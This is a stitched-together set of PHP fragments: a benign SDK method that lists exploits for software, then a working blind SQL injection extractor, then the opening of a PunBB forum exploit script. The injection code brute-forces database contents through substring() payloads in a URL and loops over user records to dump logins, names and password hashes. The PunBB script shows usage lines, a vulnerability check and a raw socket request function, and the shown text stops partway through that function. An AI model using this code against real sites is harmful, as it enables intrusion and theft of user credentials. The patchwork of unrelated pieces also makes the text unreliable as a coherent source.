/** * Gets a list of exploits from this software * * @param array $scopes optional * * @return array List of PatrolSdk\Exploit */ public function exploits($scopes = []) { if (!$this->id) { throw new Exception("The software has no ID, can\\'t get exploits"); } if (!$this->server_id) { throw new Exception("The software has no server ID, can\\'t get exploits"); } $exploit = new Exploit($this->patrol); $exploit->defaults(['software_id' => $this->id, 'server_id' => $this->server_id]); return $exploit->all(); }
{ $characters = str_split($this->latinString . $this->specCharString); $hash = ''; $record_length = $this->getLength(1, '(' . $sql . ')'); for ($i = 1; $i <= $record_length; $i++) { foreach ($characters as $char) { $injection = "1+and+substring((" . $sql . ")," . $i . ",1)='" . $char . "'"; $id2 = strlen($injection) + 5; $param2 = '&id1=' . $id2; $url = $this->url . $injection . $param2; if (strpos($out = file_get_contents($url), 'User exists') !== false) { $hash .= $char; continue; } } } return $hash; } } $exploit = new Exploit(); //$exploit->getBySQL("SELECT+string_agg(CONCAT(column_name,'=>',data_type),';')FROM+information_schema.columns+WHERE+table_name='users'"); //$exploit->getBySQL('SELECT+current_database()'); //$exploit->getBySQL('SELECT+version()'); for ($i = 1; $i <= 15; $i++) { var_dump('------------------------------'); var_dump($exploit->getCell($i, 'login')); var_dump($exploit->getCell($i, 'first_name')); var_dump($exploit->getCell($i, 'last_name')); var_dump($exploit->getPassHash($i)); var_dump('------------------------------'); }
------------------------------------------------------------------- Usage: php [punbb.php] [host/path] [mode] php [punbb.php] [host/path] [save] php [punbb.php] [host/path] [NULL] Example: php punbb.php localhost/punbb save php punbb.php localhost/punbb NOTE: Don't add me on MSN Messenger */ $exploit = new Exploit(); $domain = $argv[1]; $mymode = $argv[2]; $exploit->starting(); $exploit->is_vulnerable($domain); $exploit->exploiting($domain, $mymode); class Exploit { function http_request($host, $data) { if (!($socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP))) { echo "socket_create() error!\r\n"; exit; } if (!socket_set_option($socket, SOL_SOCKET, SO_BROADCAST, 1)) { echo "socket_set_option() error!\r\n";